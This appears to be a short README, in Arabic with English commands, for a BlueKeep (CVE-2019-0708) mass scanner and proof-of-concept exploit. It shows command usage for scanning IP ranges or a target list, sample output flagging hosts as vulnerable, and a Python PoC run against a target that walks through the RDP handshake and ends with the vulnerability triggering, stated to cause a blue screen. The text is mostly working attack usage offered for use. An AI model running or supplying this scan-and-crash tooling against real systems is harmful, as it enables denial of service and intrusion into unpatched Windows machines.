
CVE-2019-0708 أداة مسح جماعي لثغرة BlueKeep وPOC، حالياً فقط شاشة زرقاء.
CVE-2019-0708 أداة مسح جماعي و POC لثغرة BlueKeep، حالياً فقط شاشة زرقاء.
usage:
rdpscan.exe ip1-ip2
> .\rdpscan.exe 192.168.1.1-192.168.1.2
192.168.1.1 - VULNERABLE - CVE-2019-0708
192.168.1.2 - SAFE - CredSSP/NLA required
rdpscan.exe --file ip.txt
> .\rdpscan.exe --file ip.txt
192.168.1.1 - VULNERABLE - CVE-2019-0708
192.168.1.2 - SAFE - CredSSP/NLA required
usage:
python poc.py ip عدد بتات النظام
> python .\cve-2019-0708-poc.py 192.168.1.1 32
[+] ClientData Packet Sent
[+] ChannelJoin/ErectDomain/AttachUser Sent
[+] ClientInfo Packet Sent
[+] ConfirmActive Packet Sent
[+] Session Established
[+] Vuln Should Trigger